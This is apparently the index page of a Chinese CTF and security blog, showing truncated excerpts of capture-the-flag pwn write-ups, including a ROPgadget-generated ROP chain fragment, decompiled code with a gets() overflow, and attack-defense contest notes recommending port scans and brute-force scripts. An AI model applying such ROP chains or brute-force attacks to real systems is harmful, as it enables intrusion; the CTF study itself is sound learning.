Mr.Be1ieVe's Treasure

路虽远行则将至,事虽难做则必成

ROPgadget-not_the_same_3dsctf_2016

ROPgadget --binary not_the_same_3dsctf_2016 --ropchain 自动生成 from struct import pack p = '' p += pack('<I', 0x0806fcca) # pop edx ; ret p += pack('<I', 0x080eb060) # @ .data p += pack('<I', 0x08048b0b) # pop eax ; ret p += '/bin' p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x0806fcca) # pop edx ; ret p += pack('<I', 0x080eb064) # @

Posted by Mr.Be1ieVe on Tuesday, January 14, 2020

AWD准备

探测主机 Nmap 或 HTTPScan Nmap 扫描端口 端口攻击 常见:22,2389,1443,3306 ==准备爆破脚本!!!== WEB 攻击 Web 方面的语言多为 PHP,小部分为 Java 和

Posted by Mr.Be1ieVe on Monday, January 13, 2020

AWD常用指令

备份web目录 tar -zcvf web.tar.gz /var/www/html/ 查看已建立网络连接和对应进程 netstat -antulp | grep EST 用户管理 w 查看当前用户 pkill -kill -t <Username> 查看指定端口被哪个进程占用 lsof -i:端口号 或者 netstat -tunlp|grep 端

Posted by Mr.Be1ieVe on Monday, January 13, 2020

buu-ciscn_2019-c_1 WP

// local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+Ch] [rbp-4h] init(*(_QWORD *)&argc, argv, envp); puts("EEEEEEE hh iii "); puts("EE mm mm mmmm aa aa cccc hh nn nnn eee "); puts("EEEEE mmm mm mm aa aaa cc hhhhhh iii nnn nn ee e "); puts("EE mmm mm mm aa aaa cc hh hh

Posted by Mr.Be1ieVe on Monday, January 13, 2020

ciscn_2019_n_1 WP

int func() { int result; // eax char v1; // [rsp+0h] [rbp-30h] float v2; // [rsp+2Ch] [rbp-4h] v2 = 0.0; puts("Let's guess the number."); gets(&v1); if ( v2 == 11.28125 ) result = system("cat /flag"); else result = puts("Its value should be 11.28125"); return result; } 看见==我还尝试了一下’a&rsqu

Posted by Mr.Be1ieVe on Monday, January 13, 2020

avatar

安全运营,兼任应用安全、基础安全。

FEATURED TAGS
awd buu ctf hackthebox linux使用 xray 专业学习 基础知识 学习笔记